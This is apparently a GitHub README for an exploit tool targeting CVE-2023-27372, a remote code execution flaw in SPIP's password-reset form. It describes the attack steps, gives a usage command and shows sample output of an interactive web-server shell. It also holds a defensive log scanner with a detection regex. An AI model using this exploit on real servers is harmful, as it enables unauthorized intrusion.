estebanzarate/CVE-2023-27372-SPIP-4.2.1-Unauthenticated-RCE-PoC
CVE-2023-27372 — SPIP < 4.2.1 Unauthenticated RCE (PoC)

Unauthenticated remote code execution vulnerability in SPIP before 4.2.1. The oubli parameter of the password reset form is passed to a deserialization routine without proper validation, which makes it vulnerable to PHP object injection. A crafted serialized payload is executed server-side as the web server user, and the command output is reflected back in the response inside the value attribute of the oubli input field.

How it works

  1. Fetches the anti-CSRF token from /spip.php?page=spip_pass.
  2. Sends a POST request with a PHP serialized payload injected into the oubli parameter.
  3. Extracts the command output from the reflected value attribute in the response.
  4. Loops for interactive command execution, refreshing the CSRF token on each request.
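The request pattern described in these steps can be spotted on the defending side. The following detector is an added example, not part of this repository: it assumes a constructed, tab-separated audit log (time, client, method, path, body) from a reverse proxy or WAF that records POST bodies, and flags password-reset submissions whose oubli field carries a serialized PHP object, something the field should never legitimately contain.

```python
import re
from urllib.parse import parse_qs, urlsplit

# A serialized PHP object starts with  O:<name length>:"<class name>":<property count>:{
# The oubli field should only ever carry an e-mail address or login, so any object
# marker in it is a strong signal of a CVE-2023-27372 exploitation attempt.
PHP_OBJECT_RE = re.compile(r'O:\d+:"[^"]+":\d+:\{')

def oubli_carries_php_object(body):
    """True if the form body's oubli field contains a serialized PHP object."""
    fields = parse_qs(body, keep_blank_values=True)
    return any(PHP_OBJECT_RE.search(v) for v in fields.get("oubli", []))

def is_spip_pass_request(method, path):
    """True for a POST to spip.php?page=spip_pass (the password-reset form)."""
    if method != "POST":
        return False
    parts = urlsplit(path)
    pages = parse_qs(parts.query).get("page", [])
    return parts.path.endswith("/spip.php") and "spip_pass" in pages

def scan_log(lines):
    """Return (timestamp, client_ip) for every request matching both checks.

    Constructed log format (assumption): time, client, method, path, body,
    tab separated. Plain access logs do not record POST bodies; this needs a
    proxy or WAF audit log that does.
    """
    hits = []
    for line in lines:
        try:
            ts, client, method, path, body = line.rstrip("\n").split("\t", 4)
        except ValueError:
            continue  # malformed line, skip it
        if is_spip_pass_request(method, path) and oubli_carries_php_object(body):
            hits.append((ts, client))
    return hits

# Constructed sample: a normal reset request, an exploitation attempt (a harmless
# serialized stdClass stands in for the real payload), and an unrelated GET.
SAMPLE_LOG = [
    "2024-05-01T10:00:00Z\t203.0.113.5\tPOST\t/spip/spip.php?page=spip_pass\t"
    "page=spip_pass&oubli=alice%40example.org",
    "2024-05-01T10:00:07Z\t203.0.113.9\tPOST\t/spip/spip.php?page=spip_pass\t"
    "page=spip_pass&oubli=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22x%22%3Bs%3A1%3A%22y%22%3B%7D",
    "2024-05-01T10:00:09Z\t203.0.113.5\tGET\t/spip/spip.php?page=sommaire\t",
]

if __name__ == "__main__":
    for ts, client in scan_log(SAMPLE_LOG):
        print(f"[!] {ts} possible CVE-2023-27372 attempt from {client}")
```

The only hit is the second line; the real fix remains upgrading SPIP to 4.2.1 or later, with this check serving to spot attempts against instances not yet patched.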

Requirements

  • Python 3
  • Install dependencies:
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests beautifulsoup4 prompt_toolkit

Usage

python3 exploit.py -u http://TARGET/spip

Example:

$ python3 exploit.py -u http://10.10.10.10/spip
[*] Fetching anti-CSRF token...
[*] Testing command execution...
[+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.

Shell> whoami
www-data

References

Credits
